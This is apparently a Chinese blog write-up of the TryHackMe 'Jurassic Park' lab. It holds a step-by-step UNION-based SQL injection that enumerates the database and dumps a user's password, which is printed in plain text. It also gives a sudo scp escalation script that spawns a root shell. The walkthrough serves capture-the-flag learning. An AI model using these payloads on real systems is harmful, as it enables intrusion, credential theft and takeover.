扫描打点

80网站,点进去有个购物网站,看到
?id=1结合题上的提示,扫出来:
sql注入拿账密找到注入点
然后手测了一下,加引号会被过滤,直接加命令就行
order by测出来有 $5$ 列,union select测出来第二列是回显位union select 1,database(),3,4,5#:parkunion select 1,version(),3,4,5#:ubuntu16.04union select 1,group_concat(table_name),3,4,5 FROM information_schema.tables WHERE table_schema=database()#:items,usersunion select 1,group_concat(column_name),3,4,5 FROM information_schema.columns WHERE table_schema=database() and table_name =users#:id,username,passwordunion select 1,id,0x3a,password,5 FROM users拿到密码
ih8dinos从房间简介中的黑体字找到用户名:
Dennis连到
ssh提权
连进去手快进历史记录了,看到:

flag3不是重点,重点是有scp权限,直接:1
2
3
4TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
sudo scp -S $TF x y:提到
root
THM打靶日寄27-Jurassic Park
- 本文链接: http://noone40404.github.io/2024/11/21/THM打靶日寄27:Jurassic Park/
- 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!